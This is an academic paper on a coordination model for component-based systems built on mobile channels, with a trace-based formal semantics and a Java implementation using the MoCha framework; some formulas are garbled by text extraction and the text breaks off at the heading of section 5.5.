marcello@liacs.nl
Abstract. In this paper we present a coordination model for component-based software systems based on the notion of mobile channels, define it in terms of a compositional trace-based semantics, and describe its implementation in the Java language. Channels allow anonymous, and point-to-point communication among components, while mobility allows dynamic reconfiguration of channel connections in a system. This model supports dynamic distributed systems where components can be mobile. It provides an efficient way of interaction among components. Furthermore, our model provides a clear separation between the computational part and the coordination part of a system, allowing the development and description of the coordination structure of a system to be done in a transparent and exogenous manner. Our description of the Java implementation of this coordination model demonstrates that it is self-contained enough for developing component-based systems in object-oriented languages. However, if desired, our model can be used as a basis to extend other models that focus on other aspects of components that are less concerned with composition and coordination issues.
∗This work is partially funded by the OMEGA project on Correct Development of Real-Time Embedded Systems, EU Project IST-2001-33522.
†Corresponding author
†The research of Dr. Bonsangue has been made possible by a fellowship of the Royal Netherlands Academy of Arts and Sciences.
1. Introduction
In the last decades, structured software development has emerged as the means to control the complexity of systems. However, concepts like modularity and encapsulation alone have shown to be insufficient to support easy development of large software systems. Ideally, large software systems should be built through a planned integration of perhaps pre-existing components. This means not only that components must be pluggable, but also that there must be a suitable composition mechanism enabling their integration.
Component-based software describes a system in terms of components and their connections. Components are black boxes, whose internal implementation is hidden from the outside world. Instead, the composition of components is defined in terms of their (logical) interfaces which describe their externally observable behavior. By hiding all of its computation in components, a system can be described in terms of the observable behavior of its components and their interactions. As such, component-based software provides a high-level abstract description of a system that allows a clear separation of concerns for its coordination and its computational aspects. The importance of such high level logical descriptions of systems is growing in the Software Engineering community. For example, in the standard OO modeling language UML [8] extensions are now emerging to support logical entities as components, their interfaces, and connectors, which allow a logical decomposition and description of a system. An example of such an extension is UML-RT[26], which is an integration of the architectural description language ROOM[27] into UML.
In this paper we present and advocate a coordination model for component-based software that is based on mobile channels, give its description in terms of a transition system, and describe its implementation in the object-oriented language Java. A mobile channel is a coordination primitive that allows anonymous point-to-point communication between two components, and enables dynamic reconfiguration of channel connections in a system. It also supports dynamic distributed systems where components can be mobile.
From a software development point of view, mobile channels provide a highly expressive data-flow architecture for the construction of complex coordination schemes, independent of the computation parts of components. This enhances the re-usability of systems: components developed for one system can easily be reused in other systems with different (or the same) coordination schemes. Also, a system becomes easier to update: we can replace a component with another version without having to change any other component or the coordination scheme in the system. Moreover, a coordination scheme that is independent of the computation parts of components can also be updated without the necessity to change the components in the system.
The Java implementation presented in this paper provides a general framework that integrates a highly expressive data-flow architecture for the construction of coordination schemes with an object-oriented architecture for the description of the internal data-processing aspects of components.
The rest of this paper is organized as follows. In section 2 we discuss components and several coordination mechanisms for their composition, and present our rationale for a model based on channels. In section 3, we introduce and show the advantages of the notion of mobility for channels. In section 4, we give a compositional trace-based semantics for our model. In section 5 we describe an implementation of our model in the Java language [18]. We conclude in section 6, where we discuss related work.
2. Components and their Composition
In this section we briefly discuss the general notion of a component, the integration of components with object-oriented technology, and coordination mechanisms for composing components.
2.1. Components and their Interfaces
We define a component as a black-box entity that can be used (composed) by means of its interface only. Such an interface describes the input, output, and the observable behavior of the component. For example, the interface of a component may tell us that, given a specific input, a window with a message will appear on the screen. However, how this is implemented in the component is hidden from the outside world, i.e., a component is viewed as a black box. An interface of a component, therefore, provides an abstraction of the component which encapsulates its internal implementation details that are not relevant for its use.
In our channel-based coordination model a component interface consists of a set of mobile channel-ends through which a component sends and receives values. This set can be static or dynamic. The observable behavior can be expressed by using, for example, predicates, comments, or some graphical notation, e.g., protocol state machines as defined in UML. In section 4 we express the external observable behavior of a component in terms of a compositional trace-based semantics.
2.2. Integration of Components with Object-Oriented Technology
Components adhere to the fundamental principles that are the underpinnings of object-oriented technology:
- systemwide unique identity;
- bundling of data and functions manipulating those data;
- encapsulation for hiding detailed information that is irrelevant to its environment and other components.
However, components extend these principles by adhering to a stronger notion of encapsulation. Whereas the interface of an object involves only a one-way flow of dependencies from the object providing a service to its clients, an interface of a component involves a two-way reciprocal interaction between the component and its environment. This stronger notion of encapsulation accommodates a more general notion of re-usability because mutual dependencies are now more explicit through component interfaces. Furthermore, it allows components to be independently developed, without any knowledge of each other.
Components are self contained binary packages. Objects that are used to implement a component should not cross the component boundaries. No other restrictions are imposed on a component implementation.
The Java implementation of our coordination model, presented in section 5, demonstrates that object-oriented languages are well-suited to implement components and their composition. This implementation ensures the stronger notion of encapsulation needed for components, allowing access to a component only through its interface (which is a set of mobile channel-ends).
2.3. Coordination Among Components
Besides components, a system also needs connections among them. There are several coordination mechanisms for composing components. Because components must be pluggable, it is important that these mechanisms do not require a component to know anything about the structure of the system they are plugged into. We discuss four important types of coordination mechanisms: messaging, events, shared data spaces, and channels [2].
**Messaging.** With this type of connection, components send messages to each other. These messages need not be explicitly targeted; a component can send a message meant for any component having some kind of specific service (publish-and-subscribe model), instead of sending it to a particular component (point-to-point model). However, messaging is not really suitable for component-based software because it requires the components to know something about the structure of the system: even if they do not directly know their service providers, they must know the services provided in the system. An implementation example of this type of connection is the Java Message Queue (JMQ) [29], a package based on the Java Message Service (JMS) [30] open standard. The Microsoft Message Queuing Services [15] for COM+ [22], is another example.
**Events.** With the event mechanism a component, called the producer or event source, can create and fire events, the events are then received by other components, called consumers or event listeners, that listen to this particular kind of events. JavaBeans [19], which are seen as the components in Java, use the event mechanism.
**Shared data spaces.** In a shared data space, all components read and write values, usually tuples like in Linda [9], from and to a shared space. The tuples contain data, together with some conditions. Any component satisfying these conditions can read a tuple; tuples are not explicitly targeted. The JavaSpaces technology [10], a powerful Jini service from Sun, is an example of a shared data space that is being used for components. Lime [24] (Linda in a Mobile Environment), is a Linda middleware that can also be used for components, especially if these are mobile.
**Channels.** A channel, see figure 1, is a one-to-one connection that offers two ends to components, either a source- or a sink-end. A component can write by inserting values to the source-end, and read by removing values from the sink-end of a channel; the data-flow is locally one way: from a component into a channel or from a channel into a component. The communication is anonymous: the components do not know each other, only the channel-ends they have access to. Channels can be synchronous or asynchronous, mobile, with conditions, etc. Examples of systems based on channels include: Communicating Threads for Java [16], CSP for Java [31], both based on the CSP model [17], and Pict [25], a concurrent programming language based on the π-calculus. However, these systems either do not support distributed environments, or their channels are not mobile. MoCha [12, 7] and Nomadic Pict [32], a distributed version of Pict, do implement distributed mobile channels. However, the channels of Nomadic Pict do not have two distinct ends as defined above and are only synchronous. We explain MoCha in more detail in section 5.2.

We base our coordination model on (mobile) channels. The last three coordination mechanisms support true separation of coordination and computation concerns in a system. However, channels share many of the architectural strengths of events and shared data spaces while offering some additional benefits. Four of these benefits are: efficiency, security, architectural expressiveness, and transparent exogenous coordination.
First, although shared data spaces are useful in network architectures like blackboard systems, for most networks, like messaging, point-to-point channels can be implemented more efficiently in distributed systems. In shared data space models, the coordination middleware itself cannot generally know the potential receiver(s) of a message at the time that it is produced; any present or future entity with access to the shared data space can be the consumer of this message. In contrast, a channel-based coordination middleware always knows the connection at the opposite end of a channel, even if it changes dynamically. This additional piece of information allows the middleware to more efficiently implement the appropriate data transfer protocols. Second, like messaging and events, point-to-point channels support a more private means of communication that prevents third parties from accidentally or intentionally interfering with the private communication between two components. In contrast, shared data spaces are in principle “public forums” that allow any component to read any data they contain. Accommodating private communications within the public forum of a shared data space places an extra burden on many applications that require it. Third is architectural expressiveness. Like messaging, using channels to express the communication carried out within a system is architecturally much more expressive than using shared data spaces. With a shared data space, it is more difficult to see which components exchange data with each other, and thus depend on or are related to each other, because in principle, any component connected to the data space can exchange data with any or all other components in the system. Using channels, it is easy to see which components exchange data with each other, making it easier to apply tools for analysis of the dependencies and data-flow. Finally, in contrast to events, channels allow several different types of connections among components, e.g., synchronous, FIFO, etc., without the components knowing which channel types they are dealing with. This makes it possible to coordinate components from 'outside' (exogenous).
3. Mobile Channels
In our coordination model, components interact with each other through mobile channels. A channel is called mobile when the identities of its channel-ends can be passed on through channels to other components in the system (logical mobility). Furthermore, in distributed systems the ends of a mobile channel can physically move from one location to another, where location is a logical address space where in a components executes (physical mobility). Because the communication via channels is anonymous, when a channel-end moves (physically or logically), the component at its other end is not affected.
Mobility allows dynamic reconfiguration of channel connections among the components in a system, a property that is very useful and even crucial in systems where the components themselves are mobile.
A component is called mobile when, in a distributed system, it can move from one location (where its code is executing) to another. For example, mobile Internet agents can be seen as mobile components. The structure of a system with mobile components changes dynamically during its lifetime. Mobile channels give the crucial advantage of moving a channel-end together with its component, instead of deleting a channel and creating a new one.
In distributed systems, a channel is a *resource* that must be shared among several component instances. Therefore, in our model, a component instance must successfully connect to a channel-end before it can use that channel-end, and disconnect from it when it is no longer needed. At every moment in time, at most one component can be connected to a particular channel-end. Therefore, although many components may know the identity of a specific channel-end, the communication via mobile channels is still one-to-one.
As a concrete example of the utility of mobile channels, suppose we want to use agents to search for some specific information, e.g., coffee prices, on the Internet. Agents consult different XML[33] information sources, like databases and Internet pages. Each information source has a channel where requests can be issued, and an agent knows the identity of the source end of this channel plus the location of the information source. The agents may have a list with these channel-ends available at their creation, or this information may be passed to them through channels. In our example, we use a mobile agent that moves to the information sources at various locations. An alternative that we will consider later is to create an agent at every location.

A component $U$ has two channel connections for interaction with a mobile agent, one to send instructions and the other to receive results. At some point in time, $U$ asks the agent to search for MoCha-bean prices. Figure 2 shows the situation after the agent moves to the information source $A$ which is in a different Internet location, as expressed by the dashed lines in the figure. Right after the move, the agent creates a channel meant for reading information from the information source, and sends a request to $A$ together with the identity of the source channel-end of the created channel.
At some point in time the agent finishes searching the information source $A$ and writes all relevant information it finds for the component $U$ into the proper source channel-end. Regardless of whether or not this information has already been read by $U$, the agent moves to the location of the next information source (see figure 3). Together with the agent, the two ends of the channels connecting it to $U$ also move with it to this new location. However, the component $U$ is not affected by this. It can still write to and read from its channel-ends, even during the move; all data in a mobile channel are preserved while its ends move. For the agent the advantages of moving the channel-ends along with it is that it avoids all kinds of problems that arise if it were to delete the channels and create new ones after the move, e.g., checking if the channels are empty, notifying $U$ that it cannot use them anymore, perhaps some locking
issues to accomplish the latter, etc.
In our alternative version, we have a different non-mobile agent at each location, instead of one mobile agent, and there are only two channels for interaction with the component $U$. The channel-ends meant for the agents then move from one agent to the other. From the point of view of the component $U$ there is no difference between the two alternatives in our example.
In our example, the two channel-ends used by $U$ do not move, but it is possible to have mobility at both ends of a channel; if desired one can extend the example by passing these channel-ends on to other components in the system.
4. A Semantic Approach of our Model
In this section, we give a more precise and formal description of our coordination model, by presenting a compositional trace-based semantics of component-based systems. The semantics forms the formal basis of the notion of ‘contracts’ and provides a formal basis of the Java implementation in the next section.
We summarize the following from the previous sections. A component is a black-box entity that communicates through mobile channels. A channel has two ends each of which can either be a source or a sink end; a component writes values to the source and reads/takes values from the sink. The identity of channel-ends can also be communicated through channels, allowing dynamic reconfiguration of channel-end connections in a system. The data-flow is locally one way. Channels can be synchronous or asynchronous. Because in a distributed system a channel is a resource which must be shared among several component instances, a component instance must successfully connect to a channel-end before being able to use it; therefore, it must also disconnect from it when the channel-end is not needed anymore. In our model, at most one component instance can be connected to a particular channel-end at any given time, making the communication one-to-one. This ensures the soundness and completeness properties that are the prerequisites for compositionality [5]. Our one-to-one channels can still be composed into many-to-many connectors, while preserving these prerequisites for compositionality [3, 4].
Physical movement of channel-ends, see section 3, is present in our model for reasons of efficiency; to minimize the amount of non-local transfers in distributed systems. Therefore, both in the semantics and the implementation in section 5 components do not directly perform any kind of move operation on
channel-ends. A physical channel-end move is indirectly performed when a component instance either successfully connects to the specific channel-end or moves itself to a new (physical) location, where all the connected channel-ends move with it. This means that the physical layout of the system, whether it is distributed or not, is of no concern for the semantics that rightfully abstract from it.
Below, we first describe the observable behavior of the interface of a component, that is, its external observable behavior, in terms of a transition system that abstracts away its internal behavior. Next, we introduce a global transition system which describes the behavior of a component-based system in terms of the interactions of its components and show how this behavior can be obtained in a compositional manner. Finally, as an alternative to our global transition system, we make some comments of how to model mobile channels in the $\pi$-calculus.
4.1. Component Transition System
**Definition 4.1.** Given a set $Astate$ of abstract states ranged over by $a$ and (mutually disjoint) sets $Source$ and $Sink$ of all source and sink channel-ends, we specify a component by a transition system $Comp = (Conf, \rightarrow, c_0)$, where $Conf = AState \times \mathcal{P}(Source \cup Sink)$ is the set of configurations with its typical element $c$. The configuration of a component instance thus consists of a pair $\langle a, K \rangle$, where $K$ is the set of channel-ends known in this particular configuration. The initial configuration $c_0$ is defined as $\langle a_0, \emptyset \rangle$, where $a_0$ denotes the initial abstract state. We define the transition relation as $\rightarrow \subseteq Conf \times Act \times Conf$; as usual, we use $c \xrightarrow{act} c'$ to indicate that $(c, act, c') \in \rightarrow$.
The set of actions $Act$ consists of the following operations:
- $e \downarrow$ connect the executing component instance to the channel-end $e$.
- $e \uparrow$ disconnect the executing component instance from the channel-end $e$.
- $s!v$ write the value $v$ to the source channel-end $s$.
- $t?v$ take the value $v$ from the sink channel-end $t$.
- $t_{\langle v \rangle}$ read the value $v$ from the sink channel-end $t$ (read is the non-destructive version of take).
- $\nu(s, t)$ create a new channel with source- and sink-ends $s$ and $t$.
- $\nu(Comp, K)$ create a new component instance with the initial set of known channel-ends $K$.
- $\tau$ is the invisible operation we use to denote all other component operations that are not related to channels.
Here $v$ ranges over the set of values which includes $Source \cup Sink$. Furthermore, we have $s \in Source$, $t \in Sink$, and $e \in Source \cup Sink$.
4.2. Local Conditions
We assume that the transition relation of component satisfies the following conditions:
1. If \( \langle a, K \rangle \xrightarrow{e} \langle a', K' \rangle \) then \( e \in K \) and \( K' = K \).
A component instance can connect only to a channel-end it knows, and this operation does not
affect its set of known channel-ends.
2. If \( \langle a, K \rangle \xrightarrow{\downarrow} \langle a', K' \rangle \) then \( e \in K \) and \( K' = K \).
The same is true for disconnect.
3. If \( \langle a, K \rangle \xrightarrow{s_{tv}} \langle a', K' \rangle \) then \( s \in K \) and \( K' = K \).
A component instance can write only to a channel-end it knows, and its set of known channel-ends
is not affected.
4. If \( \langle a, K \rangle \xrightarrow{t_{sv}} \langle a', K' \rangle \) and \( v \in \text{Source} \cup \text{Sink} \) then \( t \in K \) and \( K' = K \cup \{v\} \).
A component instance can take only from a channel-end it knows. If the value obtained is a
channel-end, it becomes known to the component instance.
5. If \( \langle a, K \rangle \xrightarrow{t_{sv}} \langle a', K' \rangle \) and \( v \notin \text{Source} \cup \text{Sink} \) then \( t \in K \) and \( K' = K \).
A component instance can take only from a channel-end it knows. If the value obtained is not a
channel-end, its set of known channel-ends is not affected.
6. All conditions for take also apply to the operation read.
7. If \( \langle a, K \rangle \xrightarrow{\nu(s,t)} \langle a', K' \rangle \) then \( s \notin K \) and \( t \notin K \) and \( K' = K \cup \{s, t\} \).
When a new channel is created, the two new channel-ends must be added to the set of known
channel-ends of the component instance.
### 4.3. Global Transition System
We consider a component based system \( \pi = \{\text{Comp}_1, ..., \text{Comp}_n\} \), where \( \text{Comp}_i = \langle \text{Conf}_i, \xrightarrow{i}, c_i^0 \rangle \), for \( i = 1, \ldots, n \). To identify component instances we use the infinite set \( \text{CID} \) of component id’s, with
its typical element \( \text{id} \). A system configuration is a tuple \( \langle \sigma, \gamma, \text{Chan} \rangle \), where \( \sigma \) and \( \gamma \) are two partial
functions defined as:
\[
\sigma: \text{CID} \rightarrow \cup_i \text{Conf}_i \text{ and } \gamma: (\text{Source} \cup \text{Sink}) \rightarrow \text{CID},
\]
and
\[
\text{Chan} \subseteq \text{Source} \times \text{Sink}.
\]
A function \( \sigma \) maps every existing (i.e., element of its domain) component instance of \( \text{Comp}_i \) to its
current configuration \( e \in \text{Conf}_i \). On the other hand, a function \( \gamma: \text{Source} \cup \text{Sink} \rightarrow \text{CID} \) maps every
channel-end to the id of the component instance it is connected to. A channel-end \( e \) is disconnected
if \( \gamma(e) \) is undefined. The set \( \text{Chan} \subseteq \text{Source} \times \text{Sink} \) indicates which channel-end pairs constitute a
channel.
We now proceed by presenting a labelled transition system which describes the observable interaction
of components and channels at the system level. We have the following global actions: \( e \downarrow \text{id} \), which
indicates that the component \( \text{id} \) connects to \( e \); \( e \uparrow \text{id} \), which indicates that the component \( \text{id} \) disconnects
from \( e \); \( \langle s, t, v, ? \rangle \), which indicates that the value \( v \) has been taken from the sink \( t \) via a synchronous
communication along channel \( \langle s, t \rangle \); similarly, \( \langle s, t, v, i \rangle \) indicates that the value \( v \) has been read from
the sink \( t \) via a synchronous communication along channel \( ⟨s, t⟩; ⟨id, s, t⟩\), which indicates that the component instance \( id \) has created the channel \( ⟨s, t⟩\); finally, \( ⟨id, id', K⟩\), which indicates the creation by \( id \) of a new component instance \( id' \) with the initial set of channel-ends \( K \).
The channels in our transition system are all synchronous, since this is the most basic type of channel. Other Channels can be viewed as special types of components whose communication with the rest of the system can be described using the synchronous channels only. Therefore, our transition system generalizes to systems with any type of mobile channels.
connect
\[
(σ, γ, Chan) \xrightarrow{e/σ} (σ', γ', Chan)
\]
where \( γ(e) = \bot \) holds if \( γ(e) \) is either undefined or is equal to \( id \), \( σ' = σ[c/σ] \), and \( γ' = γ[σ'/σ] \).
A component instance can connect to a channel-end if either the channel-end is disconnected or it is already connected to the same component instance.
disconnect
\[
σ(id) \xrightarrow{e} c
\]
\[
(σ, γ, Chan) \xrightarrow{e/σ} (σ', γ', Chan)
\]
where \( σ' = σ[c/σ] \) and
\[
γ' = \begin{cases} γ[σ/c] & \text{if } γ(e) = id \quad (\text{i.e., } γ'(e) = \bot \text{ indicates that } γ'(e) \text{ is undefined).} \\ γ' & \text{if } γ(e) \neq id. \end{cases}
\]
A component instance can disconnect from a channel-end if it is currently connected to it. The disconnect operation also succeeds if the component instance was not connected to the channel-end in the first place.
take and write
\[
σ(γ(s)) \xrightarrow{s/c} c \text{ and } σ(γ(t)) \xrightarrow{t/c} c' \text{ and } ⟨s, t⟩ \in Chan \text{ and } γ(s) \neq γ(t)
\]
\[
(σ, γ, Chan) \xrightarrow{(s,t,v)} (σ', γ, Chan)
\]
where \( σ' = σ[c/γ(s)]v/c/γ(t) \). The operations take and write must be performed at the same time on the ends of the same channel. The channel-ends must be connected to the component instances, however, we do not have to check this since the function \( γ \) returns only a connected component instance. Since self-communication is a non-global internal issue of the component we must insist that \( γ(s) \neq γ(t) \).
read and write
\[
σ(γ(s)) \xrightarrow{s/c} c \text{ and } σ(γ(t)) \xrightarrow{t/c} c' \text{ and } ⟨s, t⟩ \in Chan \text{ and } γ(s) \neq γ(t)
\]
\[
(σ, γ, Chan) \xrightarrow{(s,t,v)} (σ', γ, Chan)
\]
where \( σ' = σ[c'/γ(t)] \). The case of the operations read and write is analogous to the case of take and write, with the exception that the operation write does not succeed yet. Only in combination with a take operation can a write operation succeed, and before then many reads can happen on the same channel. The component instance performing the write operation can be seen as an unbounded source of the same value \( v \), until a take operation is performed.
new channel
\[
σ(id) \xrightarrow{ν(s,t)} c
\]
\[
(σ, γ, Chan) \xrightarrow{(id,s,t)} (σ', γ', Chan')
\]
where \( \sigma' = \sigma[c/id], \gamma' = \gamma[\bot/s][\bot/t] \) and \( (s, t) \notin \text{Chan} \) and \( \text{Chan}' = \text{Chan} \cup \{ (s, t) \} \). Upon creation of a new channel, the channel-ends pair must not already exist. The new pair is added to \( \text{Chan} \).
They are initially disconnected in \( \gamma \).
new Component instance
\[
\begin{array}{c}
\sigma(id) \xrightarrow{\nu^{(\text{Comp}, K)}} c \\
\langle \sigma, \gamma, \text{Chan} \rangle \xrightarrow{(id, id', K)} \langle \sigma', \gamma, \text{Chan} \rangle
\end{array}
\]
where \( id' \) does not occur in the domain of \( \sigma \), \( \sigma' = \sigma[c/id][c'/id'] \), and \( c' = \langle c_0, K \rangle \), with \( c_0 \) the initial configuration of \( \text{Comp}_i \).
The creation of a new component instance consists of the selection of a new component identifier and initializing its configuration.
4.4. Trace Semantics
Given an initial set \( K \) of channel-ends, we define formally the interface \( \text{Int}(\text{Comp}, K) \) of a component \( \text{Comp} \) as the set of component traces
\[
\{ \theta \mid \langle a_0, K \rangle \xrightarrow{\theta} \},
\]
where \( a_0 \) denotes the initial (abstract) state of \( \text{Comp} \) and \( \xrightarrow{\theta} \) is the transitive closure of the transitive relation \( \xrightarrow{} \) of \( \text{Comp} \) collecting additionally the action-labels into the sequence \( \theta \).
In order to obtain the global traces generated by the global transition system in a compositional manner from the interfaces of its components, we introduce a projection operator \( P(\theta, id, K) \) that extracts from the global trace \( \theta \) the local trace of component \( id \) assuming that it is (initially) connected to the channel-ends in \( K \).
- **connect:**
\[
\begin{align*}
P(e \downarrow id.\theta, id, K) &= e \downarrow . P(\theta, id, K \cup \{ e \}) \\
P(e \downarrow id'.\theta, id, K) &= P(\theta, id, K) \quad \text{id} \neq id'
\end{align*}
\]
- **disconnect:**
\[
\begin{align*}
P(e \uparrow id.\theta, id, K) &= e \uparrow . P(\theta, id, K \setminus \{ e \}) \\
P(e \uparrow id'.\theta, id, K) &= P(\theta, id, K) \quad \text{id} \neq id'
\end{align*}
\]
- **take and write:**
\[
P((s, t, v, \?)).\theta, id, K) = \begin{cases}
s!v. P(\theta, id, K) & s \in K \\
t?v. P(\theta, id, K) & t \in K \\
P(\theta, id, K) & s, t \notin K
\end{cases}
\]
- **read and write:**
\[
P((s, t, v, \_)).\theta, id, K) = \begin{cases}
s!v. P(\theta, id, K) & s \in K \\
t?v. P(\theta, id, K) & t \in K \\
P(\theta, id, K) & s, t \notin K
\end{cases}
\]
- **new channel**:
\[
P(\langle id', s, t \rangle, \theta, id, K) = \begin{cases} \\
(s, t).P(\theta, id, K) & id = id' \\
P(\theta, id, K) & id \neq id'
\end{cases}
\]
- **new component**:
\[
P(\langle id', id'', K' \rangle, \theta, id, K) = \begin{cases} \\
\langle id'', K' \rangle.P(\theta, id, K) & id = id' \\
P(\theta, id, K) & id \neq id'
\end{cases}
\]
We define \(P(\theta, id)\) as \(P(\theta, id, \emptyset)\).
We have the following compositionality result.
**Theorem 4.1.** The set of global traces of a system of components \(\{\text{Comp}_1, ..., \text{Comp}_n\}\) generated by the global transition system equals the set
\[
\{\theta \mid \text{Ok}(\theta) \text{ and } \forall id \in \text{comp}(\theta). P(\theta, id) \in \text{Int}(\text{Comp}, K)\},
\]
where \(\text{comp}(\theta)\) denotes the set of component instances occurring in \(\theta\). The predicate \(\text{Ok}(\theta)\) rules out occurrences in \(\theta\) of communications involving channel-ends that are disconnected.
The proof of this theorem proceeds by a straightforward induction on the length of the computation.
It would be interesting to investigate if the above trace semantics is fully abstract with respect to an appropriate testing equivalence \([11]\).
### 4.5. Mobile Channels as \(\pi\)-calculus Processes
In section 4.3 we used a simple labelled transition system to model the observable interaction between the components and channels of a system, which is enough for the purposes of this paper. However, this observable interaction can also be modelled using more elaborated semantics like the \(\pi\)-calculus \([23]\). In \([14]\) we introduce the MoCha-\(\pi\) calculus, an exogenous coordination calculus that extends the \(\pi\)-calculus and is based on mobile channels. Channels in MoCha-\(\pi\) are (special kinds of) \(\pi\)-calculus processes. This allows the calculus to have user defined channel types without having to change the rules of the calculus itself. MoCha-\(\pi\) offers high-level interface \textit{write}, \textit{take}, \textit{connect} and \textit{disconnect} operations on mobile channels. The \textit{write} and \textit{take} actions are dynamically transformed into a pattern of traditional \(\pi\)-calculus synchronous actions, when a process \textit{connected} to a particular channel-end performs one of these I/O actions on it. Therefore, any mobile channel type, like FIFO, is dynamically transformed into a \(\pi\)-calculus process that interacts with its environment by means of synchronous \(\pi\)-calculus channels actions. Just like in our coordination model, in MoCha-\(\pi\) processes have no direct references to channels but only to channel-ends, and therefore, all interface operations are performed on channel-ends. Furthermore, another difference with the \(\pi\)-calculus is that MoCha-\(\pi\) treats channels as resources. Processes must compete with each other in order to gain access to a particular channel-end. More details about MoCha-\(\pi\) and the modelling of mobile channels in the \(\pi\)-calculus can be read in \([14]\).
5. Implementation in Java
The coordination model we present in this paper can be implemented in any object-oriented programming language that supports distributed environments, like Java[18], or C++[28]. In this section we describe an implementation of our model in the Java language.
The implementation consists of a framework that provides (a) a precompiler tool for writing components, (b) mobile channels, and (c) operations on these channels. All the component source files have the extension .cmp, and the precompiler transforms them into normal Java files. We do not define a new language: the .cmp files contain Java code and the precompiler just verifies certain restrictions we need to impose to have components in Java. We explain these restrictions gradually while describing the implementation.
5.1. Components in Java
Usually, JavaBeans [19] are used to implement components in Java. However, they do not comply with our definition of components (see section 2.1) for two reasons. First, a JavaBean consists of just one class, and this puts a serious restriction on the internal implementation of components. Second, JavaBeans communicate with each other through events, while we want to use channels (see section 2.3).
Instead of using JavaBeans to implement components, we use the package feature of Java. However, a package is too broad and does not provide the hard boundaries we need for components (see section 2.2). Therefore, we impose some restrictions that must be verified by our precompiler. These restrictions are (1) a component must have at least one class that represents the component’s interface, through which all coordination and access to channels takes place; (2) these interface classes are the only public classes in a package; and (3) only interface classes can have methods that are public. For simplicity, in the sequel we assume that the interface of a component consists of just one class.
Implementing a component as a package plus the restrictions explained above has two major advantages. One advantage is that access to a component is possible only through its interface. This, combined with the fact that internal references cannot be sent through a channel (see section 5.5), makes it possible to protect the internal implementation of a component.
The second advantage is that restrictions (1), (2) and (3) are so minimal that they do not impose any real restrictions concerning the internal implementation of a component. A component may consist of one or more objects, one or more threads, its implementation may be distributed, or it may be a channel-based component system itself, etc.
5.2. MoCha
Our Java implementation uses the mobile channels provided by the MoCha package. MoCha, is a framework for mobile channels in distributed environments that supports mobility as described in section 3. More details on MoCha can be found in [12, 7].
In figure 4, we show how a channel is realized in MoCha. For components, a channel consists of two data-structures, the source and the sink channel-ends, which they (separately) refer to through interface references. An interface reference is a reference from a component to a channel-end, restricting the access of the component to only the pre-defined operations on the channel. These operations include:
create, read, take, write, move, and delete. The ends of a channel must internally know each other to keep the identity of the channel and control communication. For this purpose, the ends have references to each other: the sink_rf and source_rf-fields in the figure. If the type of a channel is asynchronous then its channel-ends also have references to a buffer. The implementation of this buffer depends on the asynchronous channel type.
Figure 5 shows the implementation of an asynchronous FIFO mobile channel in MoCha. The buffer is implemented as a chain of unbounded FIFO buffers, each pointing to its next buffer through its link_rf reference. A local buffer is created by the source channel-end each time a component performs the operation write and no local buffer yet exists. This buffer is then added to the existing chain of buffers. Buffers get destroyed when they get empty due to a take operation on the sink channel-end. Both channel-ends have references, buffer_rf, to a buffer. If this reference is local and the channel-end moves to another location, then the local buffer it refers to does not move with it, instead, the buffer_rf reference is changed.
from local to non-local. With this implementation each write operation is always local. A read/take operation is either local or non-local, depending on the amount of elements needed. move operations do not involve data-transfer of elements at all [12, 7].
MoCha has been implemented in Java using the Remote Method Invocation, RMI, package[20].
5.3. Implementation Overview
Figure 6 shows a general overview of the structure of our implementation. A component is a package that contains (a) a class that describes its interface, and (b) internal entities (objects) created by the component’s programmer(s), which may also be active (threads). This package is produced by our precompiler from its .cmp files.

The component package uses, with the import feature of Java, our BasicComponent package. The BasicComponent package is an extra layer, between the component and the low level mobile channels of MoCha, needed in order to avoid dangling local references to channel-ends that may result from mobility. The BasicComponent package provides channel-end variables that only indirectly refer to MoCha channel-ends.
A component can have Sink and Source channel-end variables. However, it can perform operations on these variables only through the coordination methods of its interface (see section 5.5). To accomplish this, the package BasicComponent provides methods that are protected and which only the coordination methods of the interface can use. The package also provides a Location for the components. This data-structure is used to identify both the location of the component in the network (the IP-address) and the specific virtual machine where it is running.
Observe that instead of MoCha, we can use any other implementation of mobile channels, if desired.
5.4. The Interface of a Component
The interface of a component has two parts, a package private part accessible only to the internal entitie(s) of the component, and a public part accessible to all the entities in the system. A component interface is a normal Java class and should not be confused with the Interface feature of this language. Figure 7 shows the skeleton of a .cmp file for the interface. There is some syntactic sugar in this file that the precompiler translates into legitimate Java code:
- Component CompName;
must appear as the header of each .cmp file of a component. It is translated into package CompName;
import BasicComponent.*;
ComponentInterface IntName is translated into
public class IntName extends BasicInterface.
The interface class inherits from BasicInterface, a class that contains basic methods for both the public and the package private parts of the interface (see figure 8). The precompiler adds this class to the component’s package, which precludes the possibility of change by the programmers.
Component CompName;
/* add import list here */
ComponentInterface [IntName] // default is CompNameInterface
{
public IntName(/* parameters. For example, an initial set of channel-ends */)
{
super(loc); // call super class constructor
/* Create and initialize here all the entities of the component */
}
public void finalize()
{
/* Method is optional,
* perform cleanup actions before the object is garbage collected */
}
}
Figure 7. The .cmp Skeleton File for the Interface of a Component
The public part of the interface consists of three parts (see figures 7 and 8): one or more constructors, a getLocation method, and a finalize method. The precompiler checks if these items are the only public ones in the interface.
The interface can have one or more public constructors. The class has a super class (see figure 8) that needs a Location as a parameter for its constructor. This way we enforce that each constructor of the interface class must provide a Location, which is either created in the constructor or passed through as a parameter. In the constructor(s) all internal entities of the component must be created and initialized. Thus, in order to create a component, it is enough to import the component’s package and make an instance of its interface class.
Optionally, a finalize method can be present to perform cleanup operations before a component instance is garbage collected.
Channel-end references can be passed on through the constructor of the interface. These channel-end references constitute the initial set of mobile channel-ends known to the newly created component instance as defined in section 2.2. Alternatively, a channel-end set reference can be passed on to the component instance for it to return a new set of channel-ends that it creates during the execution of the constructor.
In this implementation we do not describe, nor dictate, any particular way of expressing the observable behavior of a component. For example, one can use the compositional trace-based semantics given in section 4.
The package private part of the interface includes the coordination methods provided by the class BasicInterface (see figure 8), channel-end variables, and all the other methods and variables in the interface that are not public. We explain the coordination methods in section 5.5.
```java
package CompName;
import MoCha.*;
import BasicComponent.*;
class BasicInterface {
BasicInterface(Location loc)
public Location getLocation()
Object[] CreateChannel(ChannelType type)
boolean Connect(ChannelEnd ce, int timeout) throws Exception
boolean Disconnect(ChannelEnd ce) throws Exception
boolean Write(Source ce, Object var, int timeout) throws Exception
Object Read(Sink ce, int timeout) throws Exception
Object Take(Sink ce, int timeout) throws Exception
boolean Wait(String conds, int timeout) throws Exception
}
```
Figure 8. The BasicInterface Class
For simplicity, we assumed that the interface of a component consists of just one class. However, we do allow components to have more than one ComponentInterface class. Therefore, a component can provide several interfaces to its users with different views and/or functionality.
5.5. The Coordination Operations
